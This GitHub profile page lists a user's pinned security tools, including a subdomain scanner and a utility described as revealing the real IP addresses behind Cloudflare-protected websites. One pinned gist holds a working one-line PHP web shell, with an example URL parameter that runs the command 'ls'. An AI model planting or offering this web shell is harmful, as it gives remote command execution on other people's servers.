Skip to content
View zidansec's full-sized avatar
💫
Ordinary people
💫
Ordinary people

Organizations

@subangxploits
Block or Report

Block or report zidansec

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
zidansec/README.md



Designs, coding, and writes about IT Security, ethics, research, and dev. This site is where I share my experiences.






Pinned

  1. CloudPeler CloudPeler Public

    CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you can easily see the real IP of websites that have been protected by CloudFlare. The resulting infor…

    PHP 1.2k 163

  2. subscan subscan Public

    Subscan is a simple tool for subdomain scanner, it can scan subdomains fast.

    PHP 33 8

  3. Smallest PHP WebShell Smallest PHP WebShell
    1
    <?=`$_GET[x]`?> // Exploit: ?x=ls
  4. Subscan Install Subscan Install
    1
    sudo wget https://raw.githubusercontent.com/zidansec/subscan/master/subscan -O /bin/subscan && sudo chmod +x /bin/subscan